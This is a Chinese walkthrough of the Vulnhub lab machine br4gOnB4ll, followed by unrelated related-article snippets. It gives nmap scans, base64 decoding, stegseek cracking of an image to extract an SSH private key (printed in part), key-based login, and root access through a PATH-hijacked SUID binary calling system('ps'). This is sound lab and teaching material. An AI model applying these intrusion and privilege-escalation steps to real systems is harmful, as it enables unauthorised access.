br4gOnB4ll靶机笔记

这是一台vulnhub上的免费靶机,比较简单。

1、主机发现

主机发现 -sn 只做ping扫描,不做端口扫描

nmap -sn 192.168.84.1/24 

Starting Nmap 7.93 ( https://nmap.org ) at 2024-07-07 07:37 EDT

Nmap scan report for 192.168.84.1

Host is up (0.00045s latency).

MAC Address: 00:50:56:C0:00:08 (VMware)

Nmap scan report for 192.168.84.2

Host is up (0.00017s latency).

MAC Address: 00:50:56:FC:23:E6 (VMware)

Nmap scan report for 192.168.84.154

Host is up (0.00024s latency).

MAC Address: 00:0C:29:30:12:59 (VMware)

Nmap scan report for 192.168.84.254

Host is up (0.00027s latency).

MAC Address: 00:50:56:FA:CE:D8 (VMware)

Nmap scan report for 192.168.84.133

Host is up.

Nmap done: 256 IP addresses (5 hosts up) scanned in 2.05 seconds

发现192.168.84.154 为目标靶机

2、nmap常规端口扫描

1)端口探测
# -sT tcp全连接扫描  --min-rate 以最低速率10000扫描   -p- 扫描全端口

nmap -sT --min-rate 10000 -p- 192.168.84.154


Starting Nmap 7.93 ( https://nmap.org ) at 2024-07-07 07:43 EDT

Nmap scan report for 192.168.84.154

Host is up (0.00092s latency).

Not shown: 65533 closed tcp ports (conn-refused)

PORT   STATE SERVICE

22/tcp open  ssh

80/tcp open  http

MAC Address: 00:0C:29:30:12:59 (VMware)

Nmap done: 1 IP address (1 host up) scanned in 1.85 seconds

发现22 ssh端口,80 http端口
2)端口版本详情探测
# -sT tcp全连接扫描  -sV 探测端口服务版本  -sC 使用默认脚本扫描 -O 探测目标操作系统

nmap -sT -sV -sC -O -p22,80 192.168.84.154


Starting Nmap 7.93 ( https://nmap.org ) at 2024-07-07 07:52 EDT

Nmap scan report for 192.168.84.154

Host is up (0.00051s latency).

PORT   STATE SERVICE VERSION

22/tcp open  ssh     OpenSSH 7.9p1 Debian 10+deb10u2 (protocol 2.0)

| ssh-hostkey:

|   2048 b5774c88d727541c561d48d9a41e2891 (RSA)

|   256 c6a8c89eed0d671faead6bd5ddf157a1 (ECDSA)

|_  256 faa9b0e3062b9263ba112f94d63190b2 (ED25519)

80/tcp open  http    Apache httpd 2.4.38 ((Debian))

|_http-title: DRAGON BALL | Aj's

|_http-server-header: Apache/2.4.38 (Debian)

MAC Address: 00:0C:29:30:12:59 (VMware)

Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port

Device type: general purpose

Running: Linux 5.X

OS CPE: cpe:/o:linux:linux_kernel:5

OS details: Linux 5.0 - 5.3

Network Distance: 1 hop

Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .

Nmap done: 1 IP address (1 host up) scanned in 7.99 seconds

3、web端,用浏览器访问80端口

1)信息搜集与查找

发现网页 DRAGON BALL 查看页面内容,阅读完这后,并没有发现有用的信息。

去查看 /robots目录,网页源码等信息,必要的时候做目录爆破

a、查看robots.txt

发现一段字符串,以=结尾,应该是base64,用base64破解一下

echo -n "eW91IGZpbmQgdGhlIGhpZGRlbiBkaXI=" | base64 -d

you find the hidden dir // 结果是一段明文,说我找到了一个隐藏的目录
b、查看网页源代码

base64破解一下

echo -n "VWtaS1FsSXdPVTlKUlVwQ1ZFVjNQUT09" | base64 -d

UkZKQlIwOU9JRUpCVEV3PQ==     #还是base64,接着破解

echo -n "VWtaS1FsSXdPVTlKUlVwQ1ZFVjNQUT09" | base64 -d | base64 -d

RFJBR09OIEJBTEw=             #被套娃了,没事我们接着破解

echo -n "VWtaS1FsSXdPVTlKUlVwQ1ZFVjNQUT09" | base64 -d | base64 -d | base64 -d

DRAGON BALL                  #终于破解出来了

集合a,b的信息,我们有理由怀疑DRAGON BALL就是隐藏得目录,拼在url后边看看

2)发现隐藏目录
http://192.168.84.154/DRAGON%20BALL/   # %20 是url编码的空格符号

查看相关信息

a)secret.txt自动化扫描
wget http://192.168.84.154/DRAGON%20BALL/secret.txt #下载下来

cat secret.txt


/facebook.com

/youtube.com

/google.com

/vanakkam nanba

/customer

/customers

/taxonomy

/username

/passwd

/yesterday

/yshop

/zboard

/zeus

/aj.html

/zoom.html

/zero.html

/welcome.html

secret.txt的内容看起来是一堆目录,去手动访问了几个都是404,我们写脚本去访问以免漏掉有用的信息

vim secret.txt   #删除末尾两个空行,以免造成干扰

自动化shell编写, 思路:拼好url路径,用curl去访问,看返回状态码等信息

因为不确定url前边的路径,我们把我们所知道的目录进行拼接

#1、在开头添加http://192.168.84.154  s 表示替换

sed 's|^|http://192.168.84.154|' secret.txt | tee secret_ext.txt

#2、拼接/DRAGON%20BALL   tee中 -a 表示追加  不加的话会覆盖原始文件

sed 's|^|http://192.168.84.154/DRAGON%20BALL|' secret.txt | tee -a secret_ext.txt

#3、拼接Vulnhub

sed 's|^|http://192.168.84.154/DRAGON%20BALL/Vulnhub|' secret.txt | tee -a secret_ext.txt

#4、手动改一下空格,就三处

vim secret_ext.txt

# /vanakkam nanba ==> /vanakkam%20nanba

访问

-r 处理 / 特殊字符  -o /dev/null输出全不要,-s静默访问,-w自定义输出 url_effecive生效的url,url_code状态码

while read -r url;do curl -o /dev/null -s -w "%{url_effective} http code:%{http_code}\n" "$url";done < secret_ext.txt


http://192.168.84.154/facebook.com http code:404

http://192.168.84.154/youtube.com http code:404

http://192.168.84.154/google.com http code:404

http://192.168.84.154/vanakkam%20nanba http code:404

http://192.168.84.154/customer http code:404

http://192.168.84.154/customers http code:404

http://192.168.84.154/taxonomy http code:404

http://192.168.84.154/username http code:404

http://192.168.84.154/passwd http code:404

http://192.168.84.154/yesterday http code:404

http://192.168.84.154/yshop http code:404

http://192.168.84.154/zboard http code:404

http://192.168.84.154/zeus http code:404

http://192.168.84.154/aj.html http code:404

http://192.168.84.154/zoom.html http code:404

http://192.168.84.154/zero.html http code:404

http://192.168.84.154/welcome.html http code:404

http://192.168.84.154/DRAGON%20BALL/facebook.com http code:404

http://192.168.84.154/DRAGON%20BALL/youtube.com http code:404

http://192.168.84.154/DRAGON%20BALL/google.com http code:404

http://192.168.84.154/DRAGON%20BALL/vanakkam%20nanba http code:404

http://192.168.84.154/DRAGON%20BALL/customer http code:404

http://192.168.84.154/DRAGON%20BALL/customers http code:404

http://192.168.84.154/DRAGON%20BALL/taxonomy http code:404

http://192.168.84.154/DRAGON%20BALL/username http code:404

http://192.168.84.154/DRAGON%20BALL/passwd http code:404

http://192.168.84.154/DRAGON%20BALL/yesterday http code:404

http://192.168.84.154/DRAGON%20BALL/yshop http code:404

http://192.168.84.154/DRAGON%20BALL/zboard http code:404

http://192.168.84.154/DRAGON%20BALL/zeus http code:404

http://192.168.84.154/DRAGON%20BALL/aj.html http code:404

http://192.168.84.154/DRAGON%20BALL/zoom.html http code:404

http://192.168.84.154/DRAGON%20BALL/zero.html http code:404

http://192.168.84.154/DRAGON%20BALL/welcome.html http code:404

http://192.168.84.154/DRAGON%20BALL/Vulnhub/facebook.com http code:404

http://192.168.84.154/DRAGON%20BALL/Vulnhub/youtube.com http code:404

http://192.168.84.154/DRAGON%20BALL/Vulnhub/google.com http code:404

http://192.168.84.154/DRAGON%20BALL/Vulnhub/vanakkam%20nanba http code:404

http://192.168.84.154/DRAGON%20BALL/Vulnhub/customer http code:404

http://192.168.84.154/DRAGON%20BALL/Vulnhub/customers http code:404

http://192.168.84.154/DRAGON%20BALL/Vulnhub/taxonomy http code:404

http://192.168.84.154/DRAGON%20BALL/Vulnhub/username http code:404

http://192.168.84.154/DRAGON%20BALL/Vulnhub/passwd http code:404

http://192.168.84.154/DRAGON%20BALL/Vulnhub/yesterday http code:404

http://192.168.84.154/DRAGON%20BALL/Vulnhub/yshop http code:404

http://192.168.84.154/DRAGON%20BALL/Vulnhub/zboard http code:404

http://192.168.84.154/DRAGON%20BALL/Vulnhub/zeus http code:404

http://192.168.84.154/DRAGON%20BALL/Vulnhub/aj.html http code:404

http://192.168.84.154/DRAGON%20BALL/Vulnhub/zoom.html http code:404

http://192.168.84.154/DRAGON%20BALL/Vulnhub/zero.html http code:404

http://192.168.84.154/DRAGON%20BALL/Vulnhub/welcome.html http code:404

全部为404,明显没有用

b)Vuln目录

里面有一张图片aj.jpg,和一个登陆页面login.html

图片下载下来,login页面中有xmen,猜测会不会是用户名呢

wget http://192.168.84.154/DRAGON%20BALL/Vulnhub/aj.jpg

查看图片信息

ls -liah aj.jpg

4850810 -rw-r--r-- 1 root root 74K 2021年 1月 5日 aj.jpg


file aj.jpg

aj.jpg: JPEG image data, JFIF standard 1.01, aspect ratio, density 1x1, segment length 16, baseline, precision 8, 959x535, components 3


#查看是否有捆绑

binwalk aj.jpg

DECIMAL       HEXADECIMAL     DESCRIPTION

--------------------------------------------------------------------------------

0             0x0             JPEG image data, JFIF standard 1.01

#没有发现


# 是否有图片隐写信息

steghide info aj.jpg

"aj.jpg":

  format: jpeg

  capacity: 4.2 KB

Try to get information about embedded data ? (y/n) y

Enter passphrase:

steghide: could not extract any data with that passphrase!

提示:这里是steghide的本身交互内容,并不能判断aj.jpg是否存在隐写内容,我们不知道passphrase,所以还不能判断

我们判断有无隐写,要结合技术观察和攻击面的研判,去综合判断

尝试爆破:

stegseek aj.jpg /usr/share/wrodlists/rockyou.txt

StegSeek 0.6 - https://github.com/RickdeJager/StegSeek

[i] Found passphrase: "love"

[i] Original filename: "id_rsa".

[i] Extracting to "aj.jpg.out".

输出了 aj.jpg.out 原名字为 id_rsa 看起来是一个凭据

mv aj.jpg.out id_rsa  #回复命名

cat id_rsa      #查看内容

-----BEGIN OPENSSH PRIVATE KEY-----

b3BlbnNzaC1rZXktdjEAAAAABG5vbmUAAAAEbm9uZQAAAAAAAAABAAABlwAAAAdzc2gtcn

NhAAAAAwEAAQAAAYEAwG6N5oDbTLLfRAwa7GCQw5vX0GWMxe56fzIEHYmWQw54Gb1qawl/

x1oGXLGvHLPCQaFprUek6CA8u2XPLiJ7SZqGAIg6XyyJY1xCmnoaU++AcI9IrgSzNyYlSF

o+QEIvwkNNA1mx9HuhRmANb06ZGzYDY6pGNvTSyvD4ihqiAXTye2A/cZmw7p5KLt4U0hSA

qucYb/IA4aa/lThOSp5QWSmPKaTm0FALRX38dRWbTBv5iR/qQFDheot+G3FlfGWqEBNuX8

SWnloCMT7QU+2N3YZYoDLI3zrQIOotKPbIUOWzciVpLXpnHPuKmHQ2SX6oJYmqpESID6l5

9ciPQzn2d7yGTZcyYO0PtnfBFngoNL1f55puIly39XeNWiUPebVSb5jBEyl+3pZ96s/BO5

Wvdopgb5VQX3h0832L3AkgW2X3tQp5FdkE/9nqxkSMfzZ6YdadpGVY5KboFiMnxWQyvB0a

ucq45Tn9kyfAAj2AQF46L9udVE4ylEkKw17oVaD5AAAFgKIce5GiHHuRAAAAB3NzaC1yc2

EAAAGBAMBujeaA20yy30QMGuxgkMOb19BljMXuen8yBB2JlkMOeBm9amsJf8daBlyxrxyz

wkGhaa1HpOggPLtlzy4ie0mahgCIOl8siWNcQpp6GlPvgHCPSK4EszcmJUhaPkBCL8JDTQ

NZsfR7oUZgDW9OmRs2A2OqRjb00srw+IoaogF08ntgP3GZsO6eSi7eFNIUgKrnGG/yAOGm

v5U4TkqeUFkpjymk5tBQC0V9/HUVm0wb+Ykf6kBQ4XqLfhtxZXxlqhATbl/Elp5aAjE+0F

Ptjd2GWKAyyN860CDqLSj2yFDls3IlaS16Zxz7iph0Nkl+qCWJqqREiA+pefXIj0M59ne8

hk2XMmDtD7Z3wRZ4KDS9X+eabiJct/V3jVolD3m1Um+YwRMpft6WferPwTuVr3aKYG+VUF

看开头 明显是ssh的凭据

4、需找立足点

尝试ssh连接

chmod 600 id_rsa # 给执行权限

ssh root@192.168.84.154 -i id_rsa


root@192.168.84.154's password:

Permission denied, please try again.

显然id_rsa不是root用户的凭据

我们想到login.html中有 xmen会不会是此凭据用户,进行尝试

ssh xmen@192.168.84.154 -i id_rsa


Linux debian 4.19.0-13-amd64 #1 SMP Debian 4.19.160-2 (2020-11-28) x86_64

The programs included with the Debian GNU/Linux system are free software;

the exact distribution terms for each program are described in the

individual files in /usr/share/doc/*/copyright.

Debian GNU/Linux comes with ABSOLUTELY NO WARRANTY, to the extent

permitted by applicable law.

Last login: Thu Jul  4 04:03:23 2024 from 192.168.84.133

xmen@debian:~$

成功进入

查看信息

xmen@debian:~$ uname -a

Linux debian 4.19.0-13-amd64 #1 SMP Debian 4.19.160-2 (2020-11-28) x86_64 GNU/Linux

xmen@debian:~$ id

uid=1000(xmen) gid=1000(xmen) groups=1000(xmen),24(cdrom),25(floppy),29(audio),30(dip),44(video),46(plugdev),109(netdev)

xmen@debian:~$ ip a

1: lo: <LOOPBACK,UP,LOWER_UP> mtu 65536 qdisc noqueue state UNKNOWN group default qlen 1000

    link/loopback 00:00:00:00:00:00 brd 00:00:00:00:00:00

    inet 127.0.0.1/8 scope host lo

       valid_lft forever preferred_lft forever

    inet6 ::1/128 scope host

       valid_lft forever preferred_lft forever

2: ens33: <BROADCAST,MULTICAST,UP,LOWER_UP> mtu 1500 qdisc pfifo_fast state UP group default qlen 1000

    link/ether 00:0c:29:30:12:59 brd ff:ff:ff:ff:ff:ff

    inet 192.168.84.154/24 brd 192.168.84.255 scope global dynamic ens33

       valid_lft 1099sec preferred_lft 1099sec

    inet6 fe80::20c:29ff:fe30:1259/64 scope link

       valid_lft forever preferred_lft forever

5、提权到root

查看root权限的文件,U+S的文件

find / -perm -4000 -type f 2> /dev/null

/home/xmen/script/shell

/usr/lib/dbus-1.0/dbus-daemon-launch-helper

/usr/lib/eject/dmcrypt-get-device

/usr/lib/openssh/ssh-keysign

/usr/bin/umount

/usr/bin/su

/usr/bin/mount

/usr/bin/chsh

/usr/bin/gpasswd

/usr/bin/chfn

/usr/bin/sudo

/usr/bin/newgrp

/usr/bin/passwd

有属于用户目录的/home/xmen/script/shell,root权限脚本即去看一下

xmen@debian:~/script$ ls -liah

total 32K

269007 drwxr-xr-x 2 root root 4.0K Jan  4  2021 .

267590 drwxr-xr-x 4 xmen xmen 4.0K Jul  4 04:15 ..

269009 -rw-r--r-- 1 root root   75 Jan  4  2021 demo.c

269016 -rwsr-xr-x 1 root root  17K Jan  4  2021 shell


查看 demo.c

xmen@debian:~/script$ cat demo.c

#include<unistd.h>

void main()

{ setuid(0);

  setgid(0);

  system("ps");

}

运行 shell脚本

xmen@debian:~/script$ ./shell

   PID TTY          TIME CMD

  1232 pts/0    00:00:00 shell

  1233 pts/0    00:00:00 sh

  1234 pts/0    00:00:00 ps

我们怀疑shell脚本运行的就是demo.c的代码

利用system("ps")进行提权

cd /home/xmen

echo "/bin/bash" > ps

chmod 777 ps

export PATH=.:$PATH


which ps

xmen@debian:~$ which ps

./ps


执行 shell脚本

xmen@debian:~$ /home/xmen/script/shell

root@debian:~#

成功提权到root

root@debian:~# id

uid=0(root) gid=0(root) groups=0(root),24(cdrom),25(floppy),29(audio),30(dip),44(video),46(plugdev),109(netdev),1000(xmen)

拿到flag

root@debian:/root# cat /root/proof.txt

   _____ __________

  /     \\______   \          ___  ___ _____   ____   ____

 /  \ /  \|       _/          \  \/  //     \_/ __ \ /    \

/    Y    \    |   \           >    <|  Y Y  \  ___/|   |  \

\____|__  /____|_  /__________/__/\_ \__|_|  /\___  >___|  /

        \/       \/_____/_____/     \/     \/     \/     \/       

join channel:   https://t.me/joinchat/St01KnXzcGeWMKSC

your flag: 031f7d2d89b9dd2da3396a0d7b7fb3e2

总结

1、通过nmap扫描到22 ssh,80 http服务

2、对http服务进行分析,通过robots.txt和网页源码等信息,发现了隐藏目录DRAGON BALL目录,进去后,看到secret.txt和Vulnhub目录对两个进行分析

3、在Vulnhub目录下查看到aj.jpg图片和login.html网页

​ 1)aj.jpg破解出了ssh的凭据id_rsa

​ 2)login.html发现了凭据的用户xmen

4、成功获得普通用户xmen的权限后,查看u+s权限文件,进行SUID提权到root权限

5、成功获得root的flag

br4gOnB4ll靶机笔记的更多相关文章

  1. vulnhub靶机Tr0ll:1渗透笔记

    Tr0ll:1渗透笔记 靶场下载地址:https://www.vulnhub.com/entry/tr0ll-1,100/ kali ip:192.168.20.128 靶机和kali位于同一网段 信 ...

  2. vulnhub靶机djinn:1渗透笔记

    djinn:1渗透笔记 靶机下载地址:https://www.vulnhub.com/entry/djinn-1,397/ 信息收集 首先我们嘚确保一点,kali机和靶机处于同一网段,查看kali i ...

  3. sqli-labs靶机注入笔记1-10关

    嗯,开始记录sqli-lab的每关笔记,复习一次 1-2关 基于错误的字符串/数字型注入 闭合的符号有区别而已 http://www.sqli-lab.cn/Less-1/?id=1 or 1=1 - ...

  4. vulnhub 靶机 Kioptrix Level 1渗透笔记

    靶机下载地址:https://www.vulnhub.com/entry/kioptrix-level-1-1,22/ kali ip 信息收集 先使用nmap收集目标的ip地址 nmap -sP 1 ...

  5. 渗透测试全流程靶机vulnhubDC-1完成笔记

    镜像下载地址 https://www.vulnhub.com/entry/dc-1-1,292/ 信息收集 1.可以使用netdiscover -i eth0 发现二层网络信息 发现两个设备(103是 ...

  6. 25. CTF综合靶机渗透(17)

    靶机链接 https://www.vulnhub.com/entry/the-ether-evilscience,212 运行环境 本靶机提供了VMware的镜像,从Vulnhub下载之后解压,运行v ...

  7. Metasploit和python两种安全工具的学习笔记

    Metasploit是个好东西 主要参考了<Metasploit渗透测试魔鬼训练营>这本书. 一.先用自己的靶机感受一下该工具的强大 linux靶机的ip如图 按照书上写的配置,如图 然后 ...

  8. Cobalt Strike学习笔记

    Cobalt Strike 一款以metasploit为基础的GUI的框架式渗透测试工具,集成了端口转发.服务扫描,自动化溢出,多模式端口监听,win exe木马生成,win dll木马生成,java ...

  9. vulnhub-DC:4靶机渗透记录

    准备工作 在vulnhub官网下载DC:4靶机https://www.vulnhub.com/entry/dc-4,313/ 导入到vmware,设置成NAT模式 打开kali准备进行渗透(ip:19 ...

  10. DC-7 靶机渗透测试

    DC-7 渗透测试 冲冲冲,好好学习 .对管道符的理解加深了好多.最后提权时,遇到了点麻烦.想不懂一条命令为啥能执行生效,耗了一整天才算解决掉. 操作机:kali 172.66.66.129 靶机:D ...

随机推荐

  1. 记Codes 重新定义 SaaS模式开源免费研发项目管理平台——多事项闭环迭代的创新实现

    1.简介 Codes 重新定义 SaaS 模式 = 云端认证 + 程序及数据本地安装 + 不限功能 + 30 人免费 Codes 是一个 高效.简洁.轻量的一站式研发项目管理平台.包含需求管理,任务管 ...

  2. 向Web服务器端上传文件

    server.py import flaskapp = flask.Flask(__name__)@app.route('/upload', methods=['POST'])def uploadFi ...

  3. 11-Python网络编程

    socket包介绍 Socket又称"套接字",应用程序通常通过"套接字"向网络发出请求或者应答网络请求,使主机间或者一台计算机上的进程间可以通讯. 创建一个T ...

  4. mysql在把子查询结果作为删除表中数据的条件,mysql不允许在子查询的同时删除原表数据

    在上一文中发布了多表删除指定记录,发现达不到我想要的效果,找了很多资料,发现以下方法. 数据库不能边查询边删除, 尝试以下操作 delete from push_msg_overview where ...

  5. 掉了两根头发后,我悟了!vue3的scoped原来是这样避免样式污染(上)

    前言 众所周知,在vue中使用scoped可以避免父组件的样式渗透到子组件中.使用了scoped后会给html增加自定义属性data-v-x,同时会给组件内CSS选择器添加对应的属性选择器[data- ...

  6. 传统RNN网络及其案例--人名分类

    传统RNN网络及其案例--人名分类 传统的RNN模型简介 RNN 先上图 这图看起来莫名其妙,想拿着跟CNN对比着学第一眼看上去有点摸不着头脑,其实我们可以把每一个时刻的图展开来,如下 其中,为了简化 ...

  7. [golang]在Gin框架中使用JWT鉴权

    什么是JWT JWT,全称 JSON Web Token,是一种开放标准(RFC 7519),用于安全地在双方之间传递信息.尤其适用于身份验证和授权场景.JWT 的设计允许信息在各方之间安全地. co ...

  8. Spring的三种依赖注入的方式

    1.什么是依赖注入 依赖注入(Dependency Injection,简称DI),是IOC的一种别称,用来减少对象间的依赖关系. 提起依赖注入,就少不了IOC. IOC(Inversion of C ...

  9. SpringBoot读取配置文件的几种方式

    示例 user: name: zhaotian age: 18 sex: 男 @Value注解 @Value注解是Spring框架提供的用于注入配置属性值的注解,它可用于类的成员变量.方法参数和构造函 ...

  10. 你真的了解Java内存模型JMM吗?

    哈喽,大家好,我是世杰. 本文我为大家介绍面试官经常考察的「Java内存模型JMM相关内容」 面试连环call 什么是Java内存模型(JMM)? 为什么需要JMM? Java线程的工作内存和主内存各 ...